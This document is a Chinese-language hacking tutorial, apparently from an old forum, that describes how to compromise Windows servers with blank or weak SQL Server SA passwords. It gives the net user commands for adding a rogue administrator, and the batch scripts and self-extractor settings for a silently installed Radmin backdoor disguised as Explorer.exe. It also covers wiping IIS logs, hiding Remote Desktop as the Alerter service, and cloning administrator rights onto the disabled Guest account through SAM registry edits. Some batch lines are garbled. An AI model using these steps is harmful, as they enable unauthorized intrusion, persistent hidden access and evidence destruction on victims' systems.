工具:WINNTAutoAttack自動攻擊器（掃漏洞）；SQLTOOLS（SA空口令連接器）；RAMDIN影子3.0中文版（遠程控制程序）（RADMIN注冊碼:

08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隱藏3389服務及不讓管理發現自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（開3389端口服務的）；psu.exe（使用被禁止的Guest帳戶要用到的）；mstsc.exe（遠程桌面連接程序）。

一.掃到SA弱口令(自動攻擊器)

二.用SQLTOOLS連上去建一個用戶

net start telnet開telnet服務net user mint mint /add 添加用戶mint密碼為mint net localgroup administrators mint /add將帳號mint升級為管理員

三.上傳后門程序RAD.EXE(RADMIN服務端自解壓程序)

制作RAD.EXE過程:

1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe；

2、在本地設置服務端（一定要生成）；

設置密碼-->>設置連接端口(默認4489)-->>生成

3、導出注冊表HKEY_LOCAL_MACHINESYSTEMRadmin的鍵值為1.reg；

4、編寫一個批處理，并命名為u.bat；

@echo offnet stop r_server

5、寫第二個批處理，r.bat,內容為：

@echo [email protected] /uninstall /[email protected] /install /silence@regedit /s 1.reg@echo [email protected] /uninstall /[email protected] /install /silence@regedit /s 1.reg@net start r_server@del rad.exe@del 1.reg@del r.bat@del u.bat

6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包；

7、將Rad.rar制作成自解壓文件；

選擇Default.sfx的自釋放模塊-->>高級自釋放選項

-->>常規

釋放路徑:%systemroot%system32

安裝程序:釋放后運行:r.bat 釋放前運行u.bat

-->>摸式

緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件

-->>確定-->>確定

生成完成。

四.用RADMIN客服端連接

上傳文件到c:WINNT(XP是windows):

port.bat(如果是在XP下，這個要把里面的WINNT改為Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上傳一個反彈后門RADMIN進入TELNET。

運行c:winnt3389.exe，重啟肉雞。

五.重啟后用遠程桌面遠程器連上去

這里就有時會出現個問題。

使用3389登陸，發現登陸用戶已滿，不用怕，我們把他踢出去。

telnet對方ip，發現需要 NTLM 身份驗證。我們在自己的電腦里建立一個帳號mint密碼為mint身份為管理員。

找到c:winntsystem32cmd.exe 建立一個快捷方式到桌面。修改cmd的快捷方式屬性為允許其他身份登陸。然后運行桌面上的cmd.exe的快捷方式。輸入帳號mint密碼mint，telnet對方ip，直接可以登陸對方電腦了。

使用命令：

c:query user (查看對方目前終端登陸狀況。)

運行命令：

c:logoff 1(踢出去一個管理者)

再用c:query user檢查一便~~(這就是為什么不馬上用1.bat了)

六.連上后..在cmd下運行

c:winntlog . 自己的IP .(擦PP)

c:winnet1.bat (刪除覆蓋查看當前在線用戶文件)

七.打SA空口令補丁

程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)

-->>Windowst身位驗證登陸

復制一下代碼:SELMIS

if exists (select * from dbo.sysobjects where id = object_id(N’[dbo].[xp_cmdshell]’)and OBJECTPROPERTY(id, N’IsExtendedProc’) = 1) exec sp_dropextendedproc N’[dbo].[xp_cmdshell]’GO

按F5(運行)，關了退出SQL Server再用SQL Server身位驗證進一次，退出(這是為了不留下記錄)。

八.改3389端口和服務名稱

修改服務器端的端口設置，注冊表有2個地方需要修改。

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]，PortNumber值，默認是3389，選擇10進制，修改成所希望的端口，比如1314。

第二個地方：

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]　PortNumber值，默認是3389，選擇10進制，修改成所希望的端口，比如1314。

要重啟系統才能用新端口連。(不急..改了他的服務名再重啟系統吧)

導出3389服務的

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]

的鍵值為mm.reg文件。編輯mm.reg文件，替換TermService為Alerter(錯誤警告服務..別的服務也行) 。再把第十行的'Description'='(這里是服務說明，改為你所換的服務說明，這里改為通知所選用戶和計算機有關系統管理級警報。)'第十一行的'DisplayName'='(這里是服務名稱，改為你所換的服務名稱，這里改為Alerter)。保存，再導入注冊表(這里要先運行Services.msc(可在CMD下打這命令)服務管理器..把Alerter的服務先停止)。

再在CMD下

CD c:winntsystem32 copy termsrv.exe service.exe(這里是復制termsrv.exe為Alerter服務文件名差不多的文件)CD C:winnt sc 127.0.0.1 config Alerter binpath= c:winntsystem32service.exe(這里是從新定向Alerter服務文件.服務名一定要區分大小寫A要大寫)

九.注消后(注消比直接關要好些)用Radmin重啟肉雞

十.使用被禁用的帳戶[Guest]登陸，刪除自己開始建的帳號

1.使用psu.exe展開注冊表到

HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers

用法：[psu -p regedit -i pid]

Pid 的值為在任務欄空白處點右鍵-->>任務管理器--->>進程中的winlogon.exe后面的數值就是PID數值。

如：psu –p regedit –i 157

將Guest克成管理員權限，克成管理員權限的方法:

找到HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesAdministrator的類型值。

在HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers下找到這個類型值在復制數值名為F的數值數劇覆蓋相應的Guest的類型值(找的方法一樣)。

導出Guest的配置(也就是導出HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersGuest和他相應的類型值的數據)，然后刪除Guest的配置。

2.查看計算機管理中帳戶列表，刷新這時候會出現錯誤[找不到帳戶](跳過這步也行)。

3.將Guest的配置(二個REG文件導進注冊表)。

4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。

net user Guest **** [修改密碼]net user Guest /active:yesnet user Guest /active:no[命令行下禁用Guest]

5.實驗被禁止的帳戶Guest是否可用。

6.用Guest登陸后刪除自己建的帳號。